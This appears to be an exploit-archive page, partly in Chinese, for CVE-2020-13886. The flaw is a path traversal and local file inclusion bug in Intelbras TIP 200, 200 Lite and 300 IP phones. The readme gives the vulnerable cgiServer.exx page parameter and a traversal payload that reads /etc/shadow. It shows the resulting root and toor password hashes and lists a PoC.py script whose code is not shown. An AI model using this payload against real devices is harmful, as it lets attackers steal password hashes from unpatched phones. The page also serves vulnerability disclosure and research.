CVE-2020-13886 PoC — 多款 Intelbras 产品路径遍历漏洞

Source

https://github.com/Ls4ss/CVE-2020-13886

Associated Vulnerability

Title:多款 Intelbras 产品路径遍历漏洞 (CVE-2020-13886)
Description:Intelbras Intelbras TIP 200是巴西Intelbras公司的一款IP电话产品。该设备是一个IP终端，最多支持两个SIP账户，拥有高语音质量（HD Voice）、LCD（2x15）、电源PoE（以太网供电）等功能。Intelbras Intelbras TIP 200 Lite是巴西Intelbras公司的一款IP电话产品。该设备是一个IP终端，最多支持两个SIP账户，拥有高语音质量（HD Voice）、LCD（2x15）、电源PoE（以太网供电）等功能。 Intelbras 多款产

Description

Exploit CVE-2020-13886 - LFI Intelbras TIP 200 / 200 LITE /

Readme

PoC: https://youtu.be/nNKBRx8IglI
    
    -------------------------------------------------------------------------------------------------------------
    ------------- 0day: TELEFONE IP TIP200/200 LITE & TIP 300 | Local File Include | ----------------------------
    ------------------------------- P0c Author: Lucas Souza | Pentester at ProsecT ------------------------------
    -------------------------------------------------------------------------------------------------------------

URL parameter ->http://HOST/cgi-bin/cgiServer.exx?page=

LFI payload -> ../../../../etc/shadow

    root:$1$.jKlhz0B$/Nmgj0klrsZk0nYc1BLUR/:11876:0:99999:7:::
    toor:$1$6sa7xxqo$eV3t7Nb1tPqjOWT1s3/ks1:11876:0:99999:7:::

                                                                                 https://prosect.com.br/

File Snapshot


 [4.0K]  /data/pocs/efccc013ded617ad0caf15b10b6e8eb447b95b4e
├── [2.0K]  PoC.py
└── [ 824]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!